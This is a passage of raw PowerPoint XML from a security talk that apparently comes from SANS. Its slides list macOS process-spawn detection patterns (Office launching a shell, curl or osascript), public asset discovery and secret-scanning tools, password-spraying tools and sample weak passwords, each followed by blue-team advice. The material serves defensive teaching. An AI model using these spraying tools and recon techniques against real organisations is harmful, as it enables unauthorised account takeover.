                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parent-child detections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS Office spawning default shell (ex: /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS Office spawning curl or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>osascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python spawning multiple shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python spawning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>osascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Launchd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> spawning a shell env or python with “/Contents/MacOS” as arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> CVE-2021-30657</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5300F7EE-A6CA-9141-A3F6-A168760DF4F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raphical user interface, text, application, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D04A98-41A0-8C46-872F-F4B8310A9E9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77271" y="2458031"/>
            <a:ext cx="4382530" cy="1339107"/>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E6E2D0F5-1B64-4A46-B81D-FF39E9373A0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77271" y="4206991"/>
            <a:ext cx="4515874" cy="1435106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366120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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121509" y="1825625"/>
            <a:ext cx="4190999" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leverage Endpoint Security Framework tools to develop good detections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProcessMonitor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppMon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBCEAC4B-47E1-454F-9350-FF4CF8AA3CE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12508" y="1306642"/>
            <a:ext cx="6977649" cy="2286858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE971C9-2EB0-E244-BCCD-F7B8E99A9AA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32817" y="3438439"/>
            <a:ext cx="4759183" cy="3419561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="565064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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Public Asset Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1825624"/>
            <a:ext cx="6056869" cy="4871737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet registry data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shodan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Censys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> searches (netblocks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> certs, org searches, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud Asset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cloud_enum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CloudBrute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Publicly available files hosted: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>PowerMeta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Searching for exposed secrets in git: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>gitleaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>gitrob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>truffleHog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS subdomain brute forcing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7183742-6CAC-1345-B30B-9ADF0CDD0126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997541" y="2677253"/>
            <a:ext cx="4775188" cy="3168478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D726811-1781-3C41-A14B-51311DE40FD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109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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282146" y="1813268"/>
            <a:ext cx="7379042" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proactively assess what is publicly exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build the processes/runbooks/workflow to address misconfigured exposures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D01C0A-044D-AC48-A6FE-07829F236F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7956740" y="3093697"/>
            <a:ext cx="3489244" cy="2613283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CC23B8-345C-5844-9AB3-7F4C4E36A45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271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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Sprays</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1442565"/>
            <a:ext cx="8454080" cy="4871737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SprayingToolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MSOLSpray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>oktasprayer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Targeting weak passwords </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P@ssw0rdP@ssw0rd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summer2020!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company2020!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2FA is certainly better than nothing but may not the “silver bullet”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D0734BA-EC9B-8446-A296-E8CD25233A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="2118497"/>
            <a:ext cx="3810000" cy="2794000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F974F3D-DAEE-9A48-B875-DD53A456D13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01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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
